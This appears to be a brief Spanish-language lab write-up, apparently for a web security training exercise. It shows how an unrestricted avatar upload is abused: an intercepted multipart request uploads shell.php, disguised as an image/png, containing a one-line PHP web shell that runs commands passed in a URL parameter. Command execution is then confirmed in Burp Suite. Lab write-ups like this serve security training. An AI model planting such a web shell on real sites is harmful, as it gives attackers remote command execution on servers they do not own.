Remote code execution via web shell upload
![[20251013231315.png]](/assets/20251013231315.vuDEBFxX.png)
En el sitio web encontramos un apartado para subir una imagen.
![[20251013231859.png]](/assets/20251013231859.BWPiA5mq.png)
Probamos subir una imagen y este se nos pone como avatar.
![[20251013232339.png]](/assets/20251013232339.Xy0TlcoA.png)
Interceptamos y insertamos un código en php para obtener un web shell.
c
------geckoformboundary898b737b1d908541730ff05f516dd0ba
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: image/png
<?php system($_GET['cmd']); ?>Luego enviamos la petición.
![[20251013232325.png]](/assets/20251013232325.DMD4Vse-.png)
Al ir a la ruta de nuestra shell.php y ejecutar comandos, se observa que efectivamente se puede ejecutar comandos.
![[20251013232527.png]](/assets/20251013232527.C5ndjn5Q.png)
Probamos desde el burpsuite para observar mejor:
![[20251013232629.png]](/assets/20251013232629.DXDDIpFd.png)